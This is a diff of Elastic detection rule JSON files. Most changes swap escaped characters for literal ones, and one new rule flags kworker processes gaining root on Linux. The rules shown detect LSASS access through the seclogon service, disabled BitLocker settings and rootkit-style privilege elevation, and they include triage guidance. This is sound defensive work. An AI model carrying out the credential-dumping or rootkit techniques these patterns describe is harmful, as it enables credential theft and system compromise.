b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json index bd2597511d5..82fe6899d69 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json index c1eac856f4a..db8316eadca 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json index a99283f09ce..4e3766be34c 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json @@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json index c8d0e86c6a3..4c3611900f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json @@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json index 4ec417a1ead..189751d6dc1 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json @@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json index 3dc84682859..2d8534455b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json @@ -38,7 +38,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json index 1cf1756deb2..b7c3e6a326d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json index 4fa9af0077d..c42dc51dc1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Bitlocker Setting Disabled", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting \u003e Audit` and `Investigation \u003e Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting > Audit` and `Investigation > Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.admin.new_value:\"Disabled\" and google_workspace.admin.setting.name:BitLocker*\n", "references": [ "https://support.google.com/a/answer/9176657?hl=en" @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json index bf0da5bf5df..fe32547ec32 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Bitlocker Setting Disabled", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting \u003e Audit` and `Investigation \u003e Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting > Audit` and `Investigation > Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.admin.new_value:\"Disabled\" and google_workspace.admin.setting.name:BitLocker*\n", "references": [ "https://support.google.com/a/answer/9176657?hl=en" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json index 9f8eb4658a6..5f6c6e58f2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json index 6a2cebea9eb..5213ae89823 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json new file mode 100644 index 00000000000..2470426d5aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through the kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process, and hijack the execution flow by hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Kworker UID Elevation", + "query": "process where host.os.type == \"linux\" and event.action == \"session_id_change\" and event.type == \"change\" and\nprocess.name : \"kworker*\" and user.id == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json index 9981dcce3c6..037d39383c3 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json @@ -93,7 +93,7 @@ 